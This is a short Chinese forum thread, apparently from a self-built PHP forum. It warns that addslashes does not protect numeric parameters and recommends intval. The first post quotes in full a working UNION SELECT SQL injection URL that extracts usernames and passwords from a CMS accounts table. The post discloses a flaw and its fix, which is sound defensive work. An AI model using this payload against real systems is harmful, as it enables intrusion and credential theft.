主页 思维拓展 关于数字类型的变量过滤时不能使用addslashes
狄默默
发表于2014-01-09 14:29:39    只看楼主 楼主
头衔:  敏而好学
注册时间: 2013-10-30
用户组: 日常管理组
发帖数:  50
金币数:  117
短消息
这是不安全的
被人攻破过,有幸得到攻击代码
http://localhost/course_fee.php?p_id=1&option_id=-1+union+select+1,2,3,4,5,6,concat(username,char(32),password),8,9,
10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+
cms_accounts;--+&type=1

可以将用户名和密码查出来
引用回复  有问题来官网论坛反馈 ~ 购买需求请去邮箱咨询
 
狄默默
发表于2014-01-09 14:30:47 1楼
头衔:  敏而好学
注册时间: 2013-10-30
用户组: 日常管理组
发帖数:  50
金币数:  117
短消息
整形变量过滤时使用intval.
引用回复  有问题来官网论坛反馈 ~ 购买需求请去邮箱咨询

回复人
回复内容

Powered BY YouYaX
个人自主开发论坛,从2010年10月份开发至今!

操作管理